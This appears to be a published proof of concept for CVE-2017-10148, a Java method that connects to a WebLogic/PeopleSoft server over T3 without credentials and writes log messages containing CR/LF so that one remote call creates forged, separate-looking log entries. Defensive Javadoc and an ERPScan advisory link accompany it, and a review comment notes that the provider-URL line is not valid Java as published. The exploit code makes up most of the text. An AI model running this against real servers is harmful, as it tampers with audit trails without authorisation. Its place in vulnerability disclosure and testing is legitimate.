
CVE-2017-10148


PoC

/**
 * Proof-of-concept for the log injection tracked on this page as CVE-2017-10148.
 *
 * <p>Opens a JNDI context over T3 to the given host and port using the WebLogic initial
 * context factory, looks up {@code weblogic.common.T3Services}, and writes one message at
 * each of five log levels through the returned service. Only the factory and the provider
 * URL are placed in the environment; no {@code Context.SECURITY_PRINCIPAL} or
 * {@code Context.SECURITY_CREDENTIALS} is supplied, so the lookup and the log calls are
 * attempted without credentials.
 *
 * <p>Defensive reading: every message carries a line break (LF followed by CR) between two
 * markers. A log writer that does not neutralise CR/LF (CWE-117) stores the second marker
 * on a line of its own, so one remote call can look like a separate, server-authored entry.
 * Audit trails built on these logs should therefore be checked for records that lack the
 * expected record prefix, the logging path should encode or strip CR/LF, and T3 should be
 * reachable only from trusted networks in addition to applying the vendor fix named in the
 * referenced advisory.
 *
 * @param PS_SERVER_IP host part of the {@code t3://} provider URL
 * @param PS_SERVER_PORT port part of the {@code t3://} provider URL
 * @return always {@code false}; the return value does not report whether anything was logged
 * @throws NamingException declared; JNDI context creation and lookup are the visible candidates
 * @throws JMSException declared by the signature; the raising call is not visible here
 * @throws RemoteException declared by the signature; the raising call is not visible here
 * @throws T3Exception declared by the signature; the raising call is not visible here
 * @throws ServerMigrationException declared by the signature; the raising call is not visible here
 * @throws PersistentStoreException declared by the signature; the raising call is not visible here
 */
static boolean anon_log_injection(String PS_SERVER_IP,String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException, PersistentStoreException {
        // JNDI environment: factory and provider URL only, no principal or credentials.
        Properties p = new Properties();
        p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
        // NOTE(review): this line is not valid Java as published (a string literal is followed
        // directly by an identifier); the listing is kept verbatim.
        p.put(Context.PROVIDER_URL, "t3://"PS_SERVER_IP+":"+PS_SERVER_PORT);
        Context ctx = new InitialContext(p);
        // The T3 services object is obtained by name and narrowed to its remote interface.
        Object obj = ctx.lookup("weblogic.common.T3Services");
        Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class);
        T3ServicesDef h = (T3ServicesDef) o;
        // One write per level; the numbered markers make it visible in the server log whether
        // the text after the embedded "\n\r" was stored as its own line (missing CR/LF
        // neutralisation) or kept inside the original record.
        h.log().log("ERPScan_1\n\rERPScan_2");
        h.log().info("ERPScan_3\n\rERPScan_4");
        h.log().error("ERPScan_5\n\rERPScan_6");
        h.log().warning("ERPScan_7\n\rERPScan_8");
        h.log().debug("ERPScan_9\n\rERPScan_10");
        // Constant result: the outcome has to be confirmed by inspecting the server-side log.
        return false;
    }

[Reference] https://erpscan.com/advisories/erpscan-17-042-anonymous-log-injection-in-fscm/